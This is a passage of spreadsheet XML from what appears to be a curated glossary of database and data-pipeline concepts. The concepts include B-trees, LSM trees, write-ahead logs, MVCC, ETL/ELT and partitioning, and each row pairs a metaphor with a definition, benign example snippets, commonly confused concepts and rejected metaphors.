          <t>0x01020304 -&gt; bytes: / big-endian: 01 02 03 04 (network order) / little-endian: 04 03 02 01 (x86, most ARM)</t>
        </is>
      </c>
      <c r="G770" t="inlineStr">
        <is>
          <t>Character encoding (UTF-8) — encoding maps characters to bytes; endianness orders the bytes within one numeric value.</t>
        </is>
      </c>
      <c r="H770" t="inlineStr">
        <is>
          <t>Reading direction of scripts (invites confusion with text encodings).</t>
        </is>
      </c>
      <c r="J770" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K770" t="inlineStr">
        <is>
          <t>Serialization &amp; data formats</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" t="n">
        <v>0</v>
      </c>
      <c r="B771" t="inlineStr">
        <is>
          <t>769</t>
        </is>
      </c>
      <c r="C771" t="inlineStr">
        <is>
          <t>Dates and floats pitfalls</t>
        </is>
      </c>
      <c r="D771" t="inlineStr">
        <is>
          <t>Two grenades hide in every payload: a clock and a coin. The clock stamped 01/02/03 explodes into three different days on three continents; the coin dropped into float acid dissolves to 0.30000000000000004. Defuse with ISO 8601 UTC and integer cents.</t>
        </is>
      </c>
      <c r="E771" t="inlineStr">
        <is>
          <t>Serialize instants as ISO 8601 UTC (or epoch), never ambiguous local formats; never put money in binary floats — use integer cents or decimals.</t>
        </is>
      </c>
      <c r="F771" t="inlineStr">
        <is>
          <t>ts: '2026-07-10T09:30:00Z' # ISO 8601, UTC / price_cents: 999 # int, not 9.99 / 0.1 + 0.2 -&gt; 0.30000000000000004</t>
        </is>
      </c>
      <c r="G771" t="inlineStr">
        <is>
          <t>Storing local wall-clock time — right for future human events (meetings follow local rules); past instants belong in UTC.</t>
        </is>
      </c>
      <c r="H771" t="inlineStr">
        <is>
          <t>Y2K flashback (Y2K was digit width, not zone/precision ambiguity).</t>
        </is>
      </c>
      <c r="J771" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K771" t="inlineStr">
        <is>
          <t>Serialization &amp; data formats</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" t="n">
        <v>0</v>
      </c>
      <c r="B772" t="inlineStr">
        <is>
          <t>770</t>
        </is>
      </c>
      <c r="C772" t="inlineStr">
        <is>
          <t>Database page</t>
        </is>
      </c>
      <c r="D772" t="inlineStr">
        <is>
          <t>This library never lends a sentence — you must check out the whole 8KB pamphlet even to read one line. Every cart, shelf, and reading desk (buffer pool) moves pamphlets, never loose sentences (rows).</t>
        </is>
      </c>
      <c r="E772" t="inlineStr">
        <is>
          <t>The fixed-size block (commonly 8KB) that engines read, write, cache, and lock; rows live inside pages and all I/O moves whole pages.</t>
        </is>
      </c>
      <c r="F772" t="inlineStr">
        <is>
          <t>Postgres default page: 8KB / reading one 40-byte row still does 8KB of I/O / pages are the buffer-pool and WAL-image unit too</t>
        </is>
      </c>
      <c r="G772" t="inlineStr">
        <is>
          <t>OS memory page (4KB) — same idea one layer down; the engine's page is its own on-disk and buffer-pool unit.</t>
        </is>
      </c>
      <c r="H772" t="inlineStr">
        <is>
          <t>Egg-crate shipping (the egg carton already anchors 1NF).</t>
        </is>
      </c>
      <c r="J772" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K772" t="inlineStr">
        <is>
          <t>Storage engine internals</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" t="n">
        <v>0</v>
      </c>
      <c r="B773" t="inlineStr">
        <is>
          <t>771</t>
        </is>
      </c>
      <c r="C773" t="inlineStr">
        <is>
          <t>B-tree engine</t>
        </is>
      </c>
      <c r="D773" t="inlineStr">
        <is>
          <t>A banyan tree pruned absurdly wide and shallow: trunk to any of a billion leaves in three or four hops. Repairs are carved directly into the leaf where the fruit hangs (in-place update), keeping the whole tree forever sorted.</t>
        </is>
      </c>
      <c r="E773" t="inlineStr">
        <is>
          <t>Keeps rows in a balanced, very wide tree of sorted pages; point reads and updates edit pages in place — read-optimized, the mature default.</t>
        </is>
      </c>
      <c r="F773" t="inlineStr">
        <is>
          <t>MySQL InnoDB, Postgres B-tree indexes / height ~3-4 levels for billions of keys / point read = one root-to-leaf descent</t>
        </is>
      </c>
      <c r="G773" t="inlineStr">
        <is>
          <t>Binary search tree — one key per node and towering height; B-tree nodes pack hundreds of keys so the tree stays squat and disk-friendly.</t>
        </is>
      </c>
      <c r="H773" t="inlineStr">
        <is>
          <t>Corporate org chart with wide spans (org charts aren't sorted structures).</t>
        </is>
      </c>
      <c r="J773" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K773" t="inlineStr">
        <is>
          <t>Storage engine internals</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" t="n">
        <v>0</v>
      </c>
      <c r="B774" t="inlineStr">
        <is>
          <t>772</t>
        </is>
      </c>
      <c r="C774" t="inlineStr">
        <is>
          <t>LSM-tree engine</t>
        </is>
      </c>
      <c r="D774" t="inlineStr">
        <is>
          <t>A chef's order spike: new tickets stab on instantly (memtable — fast writes). A full spike is frozen and filed as a sorted stack (SSTable flush); finding an old order means rummaging several stacks until the night porter merges them (compaction).</t>
        </is>
      </c>
      <c r="E774" t="inlineStr">
        <is>
          <t>Buffers writes in a memtable, flushes sorted immutable files, merges them in background — random writes become sequential appends; write-optimized.</t>
        </is>
      </c>
      <c r="F774" t="inlineStr">
        <is>
          <t>RocksDB, Cassandra, LevelDB / write: append WAL + memtable insert (fast) / read: memtable, then newest-to-oldest SSTables</t>
        </is>
      </c>
      <c r="G774" t="inlineStr">
        <is>
          <t>B-tree engine — B-trees update pages in place, favoring reads; LSM appends and merges, favoring write throughput at read cost.</t>
        </is>
      </c>
      <c r="H774" t="inlineStr">
        <is>
          <t>Sedimentary rock layers (nice layers, but the in-memory buffer stage is missing).</t>
        </is>
      </c>
      <c r="J774" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K774" t="inlineStr">
        <is>
          <t>Storage engine internals</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" t="n">
        <v>0</v>
      </c>
      <c r="B775" t="inlineStr">
        <is>
          <t>773</t>
        </is>
      </c>
      <c r="C775" t="inlineStr">
        <is>
          <t>Write-ahead log</t>
        </is>
      </c>
      <c r="D775" t="inlineStr">
        <is>
          <t>The captain's iron rule: write the maneuver in the logbook before touching the sails. When the storm (crash) hits mid-turn, the surviving mate replays the logbook line by line and the ship ends exactly where the entries promised.</t>
        </is>
      </c>
      <c r="E775" t="inlineStr">
        <is>
          <t>Every change is appended and fsynced to a sequential log before data pages are touched; replaying the log after a crash restores committed work.</t>
        </is>
      </c>
      <c r="F775" t="inlineStr">
        <is>
          <t>COMMIT = WAL record fsynced (sequential, fast) / data pages updated lazily later / crash -&gt; replay WAL from last checkpoint</t>
        </is>
      </c>
      <c r="G775" t="inlineStr">
        <is>
          <t>Audit trail — the WAL is physical, engine-internal, recycled after checkpoints; an audit trail is business-level and kept for humans.</t>
        </is>
      </c>
      <c r="H775" t="inlineStr">
        <is>
          <t>Dear-diary-before-the-heist trope (the nautical replay is crisper).</t>
        </is>
      </c>
      <c r="J775" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K775" t="inlineStr">
        <is>
          <t>Storage engine internals</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" t="n">
        <v>0</v>
      </c>
      <c r="B776" t="inlineStr">
        <is>
          <t>774</t>
        </is>
      </c>
      <c r="C776" t="inlineStr">
        <is>
          <t>SSTables</t>
        </is>
      </c>
      <c r="D776" t="inlineStr">
        <is>
          <t>Each flush freezes a mini-dictionary in perfect alphabetical order. Nobody writes in a frozen book — corrections appear in a newer volume that shadows the old entry, and a doorman (bloom filter) swears which volumes definitely lack your word.</t>
        </is>
      </c>
      <c r="E776" t="inlineStr">
        <is>
          <t>Immutable files of sorted key-value pairs flushed from the memtable; served via sparse indexes and bloom filters, never edited — only superseded.</t>
        </is>
      </c>
      <c r="F776" t="inlineStr">
        <is>
          <t>flush memtable -&gt; users-000123.sst (sorted, frozen) / bloom filter: 'definitely absent' for cheap / sparse index -&gt; one seek into the file</t>
        </is>
      </c>
      <c r="G776" t="inlineStr">
        <is>
          <t>Memtable — the mutable in-RAM stage; SSTables are its frozen, sorted, on-disk descendants.</t>
        </is>
      </c>
      <c r="H776" t="inlineStr">
        <is>
          <t>Amber-fossilized data (amber preserves one insect, not sorted runs).</t>
        </is>
      </c>
      <c r="J776" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K776" t="inlineStr">
        <is>
          <t>Storage engine internals</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" t="n">
        <v>0</v>
      </c>
      <c r="B777" t="inlineStr">
        <is>
          <t>775</t>
        </is>
      </c>
      <c r="C777" t="inlineStr">
        <is>
          <t>Compaction</t>
        </is>
      </c>
      <c r="D777" t="inlineStr">
        <is>
          <t>A Zamboni for the dictionary stacks: between periods it glides over ten scratched-up frozen volumes, merges them into one smooth sheet, and scrapes the dead entries (tombstones) off as ice shavings.</t>
        </is>
      </c>
      <c r="E777" t="inlineStr">
        <is>
          <t>Background merge of overlapping SSTables into fewer files, keeping newest versions and dropping tombstoned deletes — pays I/O now for faster reads later.</t>
        </is>
      </c>
      <c r="F777" t="inlineStr">
        <is>
          <t>10 SSTables, key x appears 3 times -&gt; / compact to 1 file: newest x kept, tombstones gone / fewer files = fewer seeks per read</t>
        </is>
      </c>
      <c r="G777" t="inlineStr">
        <is>
          <t>VACUUM (Postgres) — vacuum reclaims dead MVCC row versions in mutable heaps; compaction merges immutable LSM files.</t>
        </is>
      </c>
      <c r="H777" t="inlineStr">
        <is>
          <t>Spring-cleaning garage sale (selling isn't merging; the Zamboni encodes 'one smooth sheet').</t>
        </is>
      </c>
      <c r="J777" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K777" t="inlineStr">
        <is>
          <t>Storage engine internals</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" t="n">
        <v>0</v>
      </c>
      <c r="B778" t="inlineStr">
        <is>
          <t>776</t>
        </is>
      </c>
      <c r="C778" t="inlineStr">
        <is>
          <t>MVCC</t>
        </is>
      </c>
      <c r="D778" t="inlineStr">
        <is>
          <t>A museum that hands each visitor time-stamped photocopies: you tour the collection exactly as it looked when you entered, while artists repaint originals in the same halls. Nobody waits; a janitor (VACUUM) later shreds copies no visitor can still see.</t>
        </is>
      </c>
      <c r="E778" t="inlineStr">
        <is>
          <t>Keeps multiple versions of each row; every transaction reads a consistent snapshot, so readers never block writers and writers never block readers.</t>
        </is>
      </c>
      <c r="F778" t="inlineStr">
        <is>
          <t>Postgres: UPDATE writes a new row version (xmin/xmax) / older snapshots still see the prior version / VACUUM reclaims versions no txn can see</t>
        </is>
      </c>
      <c r="G778" t="inlineStr">
        <is>
          <t>Lock-based concurrency — locking makes readers and writers queue; MVCC gives readers snapshots so they never queue behind writers.</t>
        </is>
      </c>
      <c r="H778" t="inlineStr">
        <is>
          <t>Git branch per reader (git is a whole VCS; overloads the metaphor).</t>
        </is>
      </c>
      <c r="J778" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K778" t="inlineStr">
        <is>
          <t>Storage engine internals</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" t="n">
        <v>0</v>
      </c>
      <c r="B779" t="inlineStr">
        <is>
          <t>777</t>
        </is>
      </c>
      <c r="C779" t="inlineStr">
        <is>
          <t>Buffer pool</t>
        </is>
      </c>
      <c r="D779" t="inlineStr">
        <is>
          <t>The librarian keeps the most-asked-for pamphlets heaped on her front desk; regulars never see the stacks. Pencil edits made on desk copies (dirty pages) are walked back to the shelves on periodic rounds (checkpoints).</t>
        </is>
      </c>
      <c r="E779" t="inlineStr">
        <is>
          <t>The engine's RAM cache of hot pages: reads hit memory instead of disk, and dirty pages are flushed back at checkpoints; hit ratio rules performance.</t>
        </is>
      </c>
      <c r="F779" t="inlineStr">
        <is>
          <t>Postgres shared_buffers, InnoDB buffer pool / 99% hit ratio: most reads never touch disk / dirty pages flushed at checkpoint</t>
        </is>
      </c>
      <c r="G779" t="inlineStr">
        <is>
          <t>Query result cache — that stores final answers to whole queries; the buffer pool caches raw pages that every query shares.</t>
        </is>
      </c>
      <c r="H779" t="inlineStr">
        <is>
          <t>Bedside book pile (no write-back story in a bedside pile).</t>
        </is>
      </c>
      <c r="J779" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K779" t="inlineStr">
        <is>
          <t>Storage engine internals</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" t="n">
        <v>0</v>
      </c>
      <c r="B780" t="inlineStr">
        <is>
          <t>778</t>
        </is>
      </c>
      <c r="C780" t="inlineStr">
        <is>
          <t>Sequential vs random I/O</t>
        </is>
      </c>
      <c r="D780" t="inlineStr">
        <is>
          <t>A record needle gliding along one groove pours out music (sequential); the DJ lifting and dropping the arm across tracks (random) buys a silent second per jump. The WAL and LSM exist to keep the needle in the groove.</t>
        </is>
      </c>
      <c r="E780" t="inlineStr">
        <is>
          <t>Contiguous access vastly outruns scattered seeks — brutal on HDDs, still real on SSDs — so engines turn random writes into sequential logs and appends.</t>
        </is>
      </c>
      <c r="F780" t="inlineStr">
        <is>
          <t>HDD: ~150 MB/s sequential vs ~100 IOPS random / SSD: gap narrows but sequential still wins / (prefetch, erase blocks, queue depth)</t>
        </is>
      </c>
      <c r="G780" t="inlineStr">
        <is>
          <t>Throughput vs latency in general — this is specifically about access pattern: the same device is orders faster when access is ordered.</t>
        </is>
      </c>
      <c r="H780" t="inlineStr">
        <is>
          <t>Supermarket aisle sweep vs scavenger hunt (shopping imagery already overused).</t>
        </is>
      </c>
      <c r="J780" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K780" t="inlineStr">
        <is>
          <t>Storage engine internals</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" t="n">
        <v>0</v>
      </c>
      <c r="B781" t="inlineStr">
        <is>
          <t>779</t>
        </is>
      </c>
      <c r="C781" t="inlineStr">
        <is>
          <t>fsync</t>
        </is>
      </c>
      <c r="D781" t="inlineStr">
        <is>
          <t>'It is written' means nothing until the wax seal: fsync presses the ring into hot wax and waits for it to harden. Skip it and your letter was merely spoken to the mail clerk (OS page cache), who may not survive the night.</t>
        </is>
      </c>
      <c r="E781" t="inlineStr">
        <is>
          <t>Forces the OS to flush its buffered writes for a file down to durable media before returning; without it, written data can vanish on power loss.</t>
        </is>
      </c>
      <c r="F781" t="inlineStr">
        <is>
          <t>f.write(data) # app buffer / f.flush() # to OS cache / os.fsync(f.fileno()) # to disk -- durable</t>
        </is>
      </c>
      <c r="G781" t="inlineStr">
        <is>
          <t>flush() — flush moves data from app buffers into the OS cache; only fsync forces the OS cache onto durable media.</t>
        </is>
      </c>
      <c r="H781" t="inlineStr">
        <is>
          <t>Notarized signature (notaries certify content, not persistence).</t>
        </is>
      </c>
      <c r="J781" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K781" t="inlineStr">
        <is>
          <t>Storage engine internals</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" t="n">
        <v>0</v>
      </c>
      <c r="B782" t="inlineStr">
        <is>
          <t>780</t>
        </is>
      </c>
      <c r="C782" t="inlineStr">
        <is>
          <t>OLTP vs OLAP</t>
        </is>
      </c>
      <c r="D782" t="inlineStr">
        <is>
          <t>Downstairs, checkout lanes beep thousands of tiny basket updates a minute (OLTP). Upstairs at midnight, one accountant reads EVERY receipt of the year to ask how bananas did (OLAP). Different rooms, different filing.</t>
        </is>
      </c>
      <c r="E782" t="inlineStr">
        <is>
          <t>OLTP: many tiny concurrent reads/writes touching single rows (row stores). OLAP: few huge scans aggregating millions of rows (column stores).</t>
        </is>
      </c>
      <c r="F782" t="inlineStr">
        <is>
          <t>OLTP: UPDATE cart SET qty=2 WHERE id=9; / OLAP: SELECT region, SUM(rev) FROM sales_5y / GROUP BY region;</t>
        </is>
      </c>
      <c r="G782" t="inlineStr">
        <is>
          <t>HTAP — hybrid engines try both in one system; the classic split is row store for OLTP, columnar warehouse for OLAP.</t>
        </is>
      </c>
      <c r="H782" t="inlineStr">
        <is>
          <t>Heartbeat vs annual physical (medical mapping strains quickly).</t>
        </is>
      </c>
      <c r="J782" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K782" t="inlineStr">
        <is>
          <t>Analytics &amp; data pipelines</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" t="n">
        <v>0</v>
      </c>
      <c r="B783" t="inlineStr">
        <is>
          <t>781</t>
        </is>
      </c>
      <c r="C783" t="inlineStr">
        <is>
          <t>ETL</t>
        </is>
      </c>
      <c r="D783" t="inlineStr">
        <is>
          <t>Airport customs before entry: luggage is pulled off the plane (extract), opened, inspected and repacked in the customs hall (transform), and only cleared bags roll into the country — the warehouse (load). Nothing dirty crosses the border.</t>
        </is>
      </c>
      <c r="E783" t="inlineStr">
        <is>
          <t>Extract from sources, transform (clean, conform, join) in a processing layer, then load the polished result into the warehouse.</t>
        </is>
      </c>
      <c r="F783" t="inlineStr">
        <is>
          <t>nightly: pull Postgres + CSVs (E) / Spark cleans, dedupes, conforms (T) / load dim/fact tables into warehouse (L)</t>
        </is>
      </c>
      <c r="G783" t="inlineStr">
        <is>
          <t>ELT — the letters swap: ELT loads raw data first and transforms inside the warehouse with SQL.</t>
        </is>
      </c>
      <c r="H783" t="inlineStr">
        <is>
          <t>Car wash before the garage (a wash tunnel is too passive to encode transform).</t>
        </is>
      </c>
      <c r="J783" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K783" t="inlineStr">
        <is>
          <t>Analytics &amp; data pipelines</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" t="n">
        <v>0</v>
      </c>
      <c r="B784" t="inlineStr">
        <is>
          <t>782</t>
        </is>
      </c>
      <c r="C784" t="inlineStr">
        <is>
          <t>ELT</t>
        </is>
      </c>
      <c r="D784" t="inlineStr">
        <is>
          <t>Moving day: the truck dumps every box straight into the garage (load raw). You unpack inside at leisure with the house's own tools (SQL transforms) — and next year you can re-unpack differently, because the original boxes are still there.</t>
        </is>
      </c>
      <c r="E784" t="inlineStr">
        <is>
          <t>Load raw data straight into the warehouse, then transform it there with SQL (dbt et al.); cheap storage and elastic compute made raw-first practical.</t>
        </is>
      </c>
      <c r="F784" t="inlineStr">
        <is>
          <t>Fivetran/Airbyte copy raw tables to Snowflake / dbt models: staging -&gt; marts, all in SQL / re-run anytime; the raw layer is untouched</t>
        </is>
      </c>
      <c r="G784" t="inlineStr">
        <is>
          <t>ETL — ETL transforms before loading, so raw data never lands; ELT keeps raw data queryable and re-transformable.</t>
        </is>
      </c>
      <c r="H784" t="inlineStr">
        <is>
          <t>'Eat now, digest later' pun (bodily humor fades fast under review).</t>
        </is>
      </c>
      <c r="J784" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K784" t="inlineStr">
        <is>
          <t>Analytics &amp; data pipelines</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" t="n">
        <v>0</v>
      </c>
      <c r="B785" t="inlineStr">
        <is>
          <t>783</t>
        </is>
      </c>
      <c r="C785" t="inlineStr">
        <is>
          <t>Batch processing</t>
        </is>
      </c>
      <c r="D785" t="inlineStr">
        <is>
          <t>The hamper fills all week; Sunday's one big wash handles everything at once — cheap per sock, and a ruined load just gets washed again (rerun). But Tuesday's mustard stain sits there until Sunday (latency).</t>
        </is>
      </c>
      <c r="E785" t="inlineStr">
        <is>
          <t>Process accumulated data in scheduled bounded chunks; high throughput and simple retries, at the cost of latency until the next run.</t>
        </is>
      </c>
      <c r="F785" t="inlineStr">
        <is>
          <t>02:00 cron: spark-submit daily_job.py / processes yesterday's partition ds=2026-07-09 / failure? rerun the whole day idempotently</t>
        </is>
      </c>
      <c r="G785" t="inlineStr">
        <is>
          <t>Stream processing — streams handle each event on arrival (seconds); batch waits for the scheduled window (hours).</t>
        </is>
      </c>
      <c r="H785" t="inlineStr">
        <is>
          <t>Monthly payday (money metaphor better saved for exactly-once).</t>
        </is>
      </c>
      <c r="J785" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K785" t="inlineStr">
        <is>
          <t>Analytics &amp; data pipelines</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" t="n">
        <v>0</v>
      </c>
      <c r="B786" t="inlineStr">
        <is>
          <t>784</t>
        </is>
      </c>
      <c r="C786" t="inlineStr">
        <is>
          <t>Stream processing</t>
        </is>
      </c>
      <c r="D786" t="inlineStr">
        <is>
          <t>A sushi conveyor: each plate is handled the instant it glides past — nothing piles up. The chef groups plates into five-minute windows and holds each window open a grace period for plates stuck behind a slow customer (watermark).</t>
        </is>
      </c>
      <c r="E786" t="inlineStr">
        <is>
          <t>Continuously process unbounded event flows as they arrive, using windows, state, and watermarks for late data; low latency, higher complexity.</t>
        </is>
      </c>
      <c r="F786" t="inlineStr">
        <is>
          <t>Kafka -&gt; Flink job scores each txn in &lt;1s / window: 5 min tumbling, watermark 30s late / state lives inside the stream processor</t>
        </is>
      </c>
      <c r="G786" t="inlineStr">
        <is>
          <t>Message queue — a queue only delivers events; stream processing computes over the flow with windows, joins, and state.</t>
        </is>
      </c>
      <c r="H786" t="inlineStr">
        <is>
          <t>River fishing with hourly nets (nets are just batches in disguise).</t>
        </is>
      </c>
      <c r="J786" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K786" t="inlineStr">
        <is>
          <t>Analytics &amp; data pipelines</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" t="n">
        <v>0</v>
      </c>
      <c r="B787" t="inlineStr">
        <is>
          <t>785</t>
        </is>
      </c>
      <c r="C787" t="inlineStr">
        <is>
          <t>Data warehouse</t>
        </is>
      </c>
      <c r="D787" t="inlineStr">
        <is>
          <t>A museum, not a storage unit: every exhibit was cleaned, verified and labeled before display (schema-on-write); visitors (analysts) wander the curated halls asking anything. Nothing enters uncatalogued.</t>
        </is>
      </c>
      <c r="E787" t="inlineStr">
        <is>
          <t>Central analytics store of cleaned, modeled, schema-enforced tables (facts and dimensions), columnar underneath, built for fast SQL aggregation.</t>
        </is>
      </c>
      <c r="F787" t="inlineStr">
        <is>
          <t>Snowflake / BigQuery / Redshift / analysts: SELECT ... FROM fact_sales JOIN dim_* / fed by ETL/ELT pipelines</t>
        </is>
      </c>
      <c r="G787" t="inlineStr">
        <is>
          <t>Data lake — the lake stores raw files of any shape; the warehouse stores curated, typed, query-ready tables.</t>
        </is>
      </c>
      <c r="H787" t="inlineStr">
        <is>
          <t>Costco of clean data (bulk shopping implies raw goods, wrong direction).</t>
        </is>
      </c>
      <c r="J787" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K787" t="inlineStr">
        <is>
          <t>Analytics &amp; data pipelines</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" t="n">
        <v>0</v>
      </c>
      <c r="B788" t="inlineStr">
        <is>
          <t>786</t>
        </is>
      </c>
      <c r="C788" t="inlineStr">
        <is>
          <t>Data lake</t>
        </is>
      </c>
      <c r="D788" t="inlineStr">
        <is>
          <t>A reservoir: raw water pours in from every stream untested — logs, CSVs, images. Anyone may dip a bucket, but each drinker filters at the shore (schema-on-read). Fire the park rangers (catalog, governance) and it silts into a swamp.</t>
        </is>
      </c>
      <c r="E788" t="inlineStr">
        <is>
          <t>Cheap object storage holding raw files in any format, schema applied on read; flexible and vast — ungoverned, it degrades into a data swamp.</t>
        </is>
      </c>
      <c r="F788" t="inlineStr">
        <is>
          <t>s3://lake/raw/events/2026/07/10/*.json.gz / Athena/Spark apply schema at query time / catalog (Glue/Unity) or nobody finds anything</t>
        </is>
      </c>
      <c r="G788" t="inlineStr">
        <is>
          <t>Lakehouse — adds table formats with ACID and schema (Iceberg, Delta) atop lake files, blending warehouse behavior into the lake.</t>
        </is>
      </c>
      <c r="H788" t="inlineStr">
        <is>
          <t>Attic of unopened boxes (garage boxes already anchor ELT).</t>
        </is>
      </c>
      <c r="J788" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K788" t="inlineStr">
        <is>
          <t>Analytics &amp; data pipelines</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" t="n">
        <v>0</v>
      </c>
      <c r="B789" t="inlineStr">
        <is>
          <t>787</t>
        </is>
      </c>
      <c r="C789" t="inlineStr">
        <is>
          <t>Columnar scan advantage</t>
        </is>
      </c>
      <c r="D789" t="inlineStr">
        <is>
          <t>Ask a full stadium the average age: the column store passes down one thin ribbon listing only ages — similar numbers that zip together tightly. The row store instead hands you every fan's entire wallet, ticket stubs and all.</t>
        </is>
      </c>
      <c r="E789" t="inlineStr">
        <is>
          <t>Analytics reads touch only the queried columns, and same-typed neighboring values compress hard — often ~100x less I/O than row storage.</t>
        </is>
      </c>
      <c r="F789" t="inlineStr">
        <is>
          <t>1B rows x 50 cols, query touches 1 col: / columnar reads ~2% of bytes, then compresses / row store drags all 50 columns per row</t>
        </is>
      </c>
      <c r="G789" t="inlineStr">
        <is>
          <t>Wide-column store (Cassandra) — a row-oriented OLTP design despite the name; columnar is a physical layout for scan speed.</t>
        </is>
      </c>
      <c r="H789" t="inlineStr">
        <is>
          <t>X-raying just the spine (the X-ray already anchors EXPLAIN).</t>
        </is>
      </c>
      <c r="J789" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K789" t="inlineStr">
        <is>
          <t>Analytics &amp; data pipelines</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" t="n">
        <v>0</v>
      </c>
      <c r="B790" t="inlineStr">
        <is>
          <t>788</t>
        </is>
      </c>
      <c r="C790" t="inlineStr">
        <is>
          <t>Partitioning</t>
        </is>
      </c>
      <c r="D790" t="inlineStr">
        <is>
          <t>An ice-cube tray for events: each day freezes into its own cube. Asking about Tuesday pops out one cube — nobody thaws the whole freezer (full scan). Retention is snapping off a stale cube, not chiseling the block.</t>
        </is>
      </c>
      <c r="E790" t="inlineStr">
        <is>
          <t>Split a table or dataset into parts by a key (usually date) so queries prune to relevant partitions and old data can be dropped wholesale.</t>
        </is>
      </c>
      <c r="F790" t="inlineStr">
        <is>
          <t>CREATE TABLE events (...) PARTITION BY RANGE (ds); / WHERE ds='2026-07-09' -- scans 1 of 365 / DROP PARTITION for retention: instant</t>
        </is>
      </c>
      <c r="G790" t="inlineStr">
        <is>
          <t>Sharding — sharding spreads data across machines for write scale; partitioning splits within one dataset for pruning and lifecycle.</t>
        </is>
      </c>
      <c r="H790" t="inlineStr">
        <is>
          <t>Filing cabinet by month (cabinets are everywhere in this domain; cubes pop).</t>
        </is>
      </c>
      <c r="J790" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K790" t="inlineStr">
        <is>
          <t>Analytics &amp; data pipelines</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" t="n">
        <v>0</v>
      </c>
      <c r="B791" t="inlineStr">
        <is>
          <t>789</t>
        </is>
      </c>
      <c r="C791" t="inlineStr">
        <is>
          <t>Idempotent pipeline runs</t>
        </is>
      </c>
      <c r="D791" t="inlineStr">
        <is>
          <t>A rubber stamp, not a tally pen: stamping the same page five times leaves one clean mark. The intern with the tally pen re-counts on every rerun, and Monday's revenue doubles each time the job hiccups.</t>
        </is>
      </c>
      <c r="E791" t="inlineStr">
        <is>
          <t>Design jobs so reruns produce the same final state — overwrite the target partition, dedupe by key — making retries and backfills safe.</t>
        </is>
      </c>
      <c r="F791" t="inlineStr">
        <is>
          <t>INSERT OVERWRITE TABLE sales PARTITION (ds='2026-07-09') / run twice -&gt; same rows, no double counting / (vs INSERT INTO: each rerun duplicates)</t>
        </is>
      </c>
      <c r="G791" t="inlineStr">
        <is>
          <t>Exactly-once delivery — a transport guarantee; idempotence makes at-least-once delivery safe by construction, the practical path.</t>
        </is>
      </c>
      <c r="H791" t="inlineStr">
        <is>
          <t>Elevator button pressed repeatedly (hackneyed; the stamp shows state overwrite).</t>
        </is>
      </c>
      <c r="J791" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K791" t="inlineStr">
        <is>
          <t>Analytics &amp; data pipelines</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" t="n">
        <v>0</v>
      </c>
      <c r="B792" t="inlineStr">
        <is>
          <t>790</t>
        </is>
      </c>
      <c r="C792" t="inlineStr">
        <is>
          <t>Constraints as last defense</t>
        </is>
      </c>
      <c r="D792" t="inlineStr">
        <is>
          <t>App validators are polite greeters at the front door, easily bypassed via the side entrance (admin script, 2 a.m. psql). The constraint is the vault's steel door in the only corridor — every path funnels through it, and it never sleeps.</t>
        </is>
      </c>
      <c r="E792" t="inlineStr">
        <is>
          <t>Database-enforced rules catch bad data from every path — app bugs, cron jobs, manual SQL; app validation is UX, the constraint is the guarantee.</t>
        </is>
      </c>
      <c r="F792" t="inlineStr">
        <is>
          <t>Rails validates :email, presence: true # skippable / update_all, raw SQL, other services bypass it / DB UNIQUE/NOT NULL/FK/CHECK cannot be bypassed</t>
        </is>
      </c>
      <c r="G792" t="inlineStr">
        <is>
